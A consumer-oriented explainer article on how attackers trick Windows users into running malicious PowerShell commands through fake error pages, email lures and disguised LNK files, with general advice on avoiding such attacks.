Whenever a Windows tool has advanced access to a computer, someone is in hot pursuit, trying to find ways to exploit it to run malware on people’s systems. PowerShell is no exception, and bad actors have found ways to use it to cause chaos on people’s computers.
But what is PowerShell, and how can it be abused?
What Is PowerShell on Windows?
Windows PowerShell is an advanced automation and configuration tool. You can use it to execute commands that tweak your system or to run scripts that automatically execute complex tasks for you. We covered this tool in our guide on what PowerShell is and the many things you can do with it.
Because PowerShell has the system permissions to change important settings on your PC or run system-sensitive scripts, bad agents find ways to get it to execute malicious code. However, before we dive into how it can be abused, it’s worth noting that PowerShell itself is not a malicious app. It’s a core part of Windows that cannot be disabled.
What Makes PowerShell So Dangerous?
When a bad actor wants to take advantage of PowerShell, they typically use one of two routes: tricking people into executing malicious code in PowerShell or creating a file that runs a bad script when opened.
Malicious Agents Convincing People to Run Commands
First, let’s cover when a malicious agent tricks someone into running a PowerShell command. This trick usually involves scaring the victim into believing they need to run a PowerShell command to fix an issue that doesn’t exist.
As reported by The Register, one such trick involves bad actors getting into legitimate websites and changing them to display a fake error message. This error claims something is wrong with the user’s Windows, Google Chrome, Office, or OneDrive copy. To fix this “issue,” the fake error claims that the user should run a PowerShell command to repair the problem.
Of course, the given code doesn’t repair anything. Instead, it tells PowerShell to connect to a server, download a malicious executable from an external server, and run it. One instance of this attack used PowerShell to download a dropper, which then downloaded five more malware strains onto the target PC.
Another variant of this “user-activated” PowerShell attack was spotted being sent via email. The email included an HTML file designed to look like Microsoft Word. When opened, it claimed it couldn’t display the information in the Word document because an extension had stopped working. The user was then asked to copy-paste malicious code into PowerShell to fix it or download a bad file that does the job for the bad actor.
Malicious Files Using PowerShell to Run Fileless Malware
The scarier version of the PowerShell attack uses fileless malware to attack the target. This uses PowerShell to execute malicious tasks without downloading files on the victim’s PC. If the malware doesn’t download any files, it prevents antivirus software from detecting it, making it hard to find and remove.
We covered a sneaky version of this attack in our piece on malware that attacks illegal movie downloaders. This method of attack usually disguises a LNK file that contains a malicious script as another file. In the illegal movie example, the LNK file was modified to look like a video file to fool people into running it.
How to Avoid PowerShell Attacks
The problem with taking steps to avoid PowerShell attacks is that there are legitimate fixes out there that require you to enter commands into PowerShell. As such, before you enter a command, it’s a good idea to take some time and consider how trustworthy the source is.
If you’re looking for a fix and find a respectable and reputable website stating you should use a command, then it should be fine to execute it. If it’s coming to you from a blaring fake error message designed to make you panic, it’s going to do damage.
If you see a command and are unsure what it does, try searching for it online. If it’s helpful, you should find results of other people suggesting the command. If you don’t find anything (or even find someone reporting it as malicious), running it is not a good idea.
If you end up running a PowerShell attack by mistake, you could try siccing the best antivirus programs for the malware. However, as we covered earlier, PowerShell attacks will do their best to make themselves as undetectable as possible. If you notice something off after running a PowerShell command, your best bet is to clean install your operating system to ensure everything is erased.
By itself, PowerShell is a handy tool that gives you advanced control over your PC. However, some bad actors try to trick people into misusing it. Fortunately, if you keep your wits about you, you can avoid being hit by one.
